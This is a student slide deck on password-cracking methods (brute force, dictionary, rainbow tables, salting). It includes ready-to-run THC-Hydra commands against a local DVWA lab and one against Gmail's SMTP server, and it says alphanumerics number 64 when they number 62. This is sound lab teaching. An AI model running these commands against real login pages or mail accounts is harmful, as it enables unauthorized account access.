cyber security project - unice.frdeptinfo.unice.fr/~bmartin/passwords.pdf · dvwa (damn vulnerable...

CYBER SECURITY PROJECTPASSWORD CRACKING

BALLERIO SIMONEGALASSO EMANUELE

Summary

2

Thc hydra

Password Cracking

Experiments

3

Password Cracking features

Online Attack Offline Attack

Dictionary Attack Brute Force

What is password cracking?

Raibow table Hybrid tecniques

4

Password cracking is the process of attempting to gain unauthorizedaccess to restricted systems using common passwords oralgorithms that guess passwords.

What is password cracking?

5

How is stored a Password?

PasswordHASH FUNCTION

Hashed Password

6

Online VS Offline Cracking

Try a large number of username/passwordcombinations against the login portal

limited by the speed of the network

Try to get the hash of the password inoffline situation and then crack themtrying to find the clear-text value thatcomputes to that hash.

Limited by the speed of the hacker’s machine

Brute Force Attack

7

Depends only on the length of the password and on the system used

Try all the possible combination of characters.

We are sure at 100% to find the password but we don’t know how longer will be the process.

Example Brute Force

8

Let’s consider for a moment to be in an environment where all the power of the systems are equal to each other, and consider that we should have to find a Password composed only by 8 alpha numeric characters. How many attempts do we have to do in the worst case?

PROBLEM

Consideration

Alpha numeric characters are: a...z, A...Z, 0...9 = 64 possibilities.

We already know the username.

The solution depends only on the length of the password.

Knowing the exactly length of the password always simplify the job.

Example Brute Force

9

SOLUTION

648 possible combinations (Disposition with ripetition 𝐷r𝑛𝑘 = 𝑛𝑘)

Dictionary Attack

10

Depends on the complexity of the password and on it’s no ordinary meaning.

Try all the strings in a pre-arranged listing.

There are less chance of arriving at a solution, but if we arrive is in relatively fast time.

Example Dictionary Attack

11

Let’s consider a Dictionary Attack with the French dictionary, where there are roughly 135.000 words.

PROBLEM

SolutionWe can found a common French Password just trying 135.000 times. .

Rainbow table Attack

12

It is a pre-computed dictionary of plain text passwords and their corresponding hash value.

More than one text can produce the same hash, it’s not important to know what the original password really was.

Salting passwords is a common method of preventing rainbow table attacks.

Salting Passwords

13

BOB ALICESAME PASSWORD = SAME HASH STORED

Hybrid Attack

14

Hybrid Dictionary

Background knowledge Dictionary

Maximize your chances of success

15

Experiments

16

Kali Linux is an advanced penetration testing distribution

Tools

Hydra is a parallelized login cracker

Damn VulnerableWeb App

17

Kali LinuxKali contains several hundred tools which are geared towards various information security tasks, such as:

Penetration Testing

Security research

Computer Forensics

Reverse Engineering

Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

18

Hydra

• Is very fast and flexible

• New modules are easy to add

• Show how easy it would be to gain unauthorized access to a system remotely

19

DVWA (Damn Vulnerable Web App)

Ethical hackers test their skills and run tools in a legal environment.

• For beginners and advanced users to proof their skill DVWA is the best platform.

• This is the best place to do hacking.

• Helps web developer better understand the processes of securing web applications

20

Idea of Experiments

In the current experiments, a password cracking is proposed connected to thediscovery of the [user-password] pair relative to the access credentials located

within the DVWA special software program.

21

Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk

22

Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk

23

Brute Force

In this case it is not possible to show the solution because the password combinations are very high and therefore would take a long time.

24

Dictionary Attack

hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1 http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie : security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

25

Dictionary Attack

hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1 http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie : security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

26

Dictionary Attack

• Low: This security level is completely vulnerable and has no securitymeasures at all.

• Medium: This setting is mainly to give an example to the user ofbad security practices, where the developer has tried but failed tosecure an application.

27

Dictionary Attack

28

Smtp Attack

hydra smtp.gmail.com -l test2.20192020@gmail.com -P temp -s 465 -S -V -f smtp

29

Other Possible Experiments

THC-Hydra supports many different services:

• Afp• Cisco • Cvs• Firebird• Ftp• Http-get• Http-head• Http-proxy• Https-get

• Https-head• Https-form-get• Https-form-post• Imap• Smb• Ldap2• Ldap3• Mssql• Mysql

• Ncp• Nntp• Oracle-listener• Pcanywhere• Pop3• Postgres• Rexecsnmp• Smtp• Telnet

30

CONCLUSION

• Use passwords that are long at least 15 characters.

• Don't use the same password for privileged user accounts between systems.

• Don't share it.

31

Thanks for the attention

32

How to testVirtual box: https://www.virtualbox.org/wiki/Downloads

Kali linux : https://linoxide.com/distros/learn-method-install-

kali-linux-virtualbox/

DVWA installation: https://medium.com/datadriveninvestor/setup-install-dvwa-

into-your-linux-distribution-d76dc3b80357

If you have any type of problem during the installation contact us, and we will give you a .vdi file of the virtual machine with all the installations that you need.

33

How to test

34

How to test

Username: root

Password: toor

35

How to test

36

How to test

1. service apache2 start2. service mysql start

37

How to testhttp://127.0.0.1/DVWA/login.php

Username: admin

Password: password

38

How to test

1

2

3

39

How to testNOW YOU ARE IN THIS PAGE:

40

How to test

1

2(Select)3

Right-click:

How to test

Test it and have fun:hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Pure Brute Force:

hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Dictionary Attack:

Try: hydra -h , for more information

42

ENJOY!